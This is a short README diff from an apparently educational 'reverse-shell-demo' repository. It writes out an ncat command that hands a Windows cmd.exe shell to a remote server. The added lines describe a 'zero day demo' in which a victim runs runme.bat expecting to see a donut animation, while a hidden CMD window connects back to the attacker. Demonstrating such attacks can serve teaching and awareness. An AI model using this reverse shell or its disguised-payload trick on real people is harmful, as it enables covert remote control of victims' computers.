101demos/reverse-shell-demo/README.md

 Run `ncat <server-internal-ip> <port> -e cmd.exe`

 *To find the internal IP run `hostname I` on Linux OR `ipconfig` on Windows.*

+## For the zero day demo, target should clone/download this repo, placing `donut.py` and `runme.bat` in the same directory.
+### When the victim executes `runme.bat` to "display" the Donut in their terminal, another CMD windows open in the background that connects to the attacking server.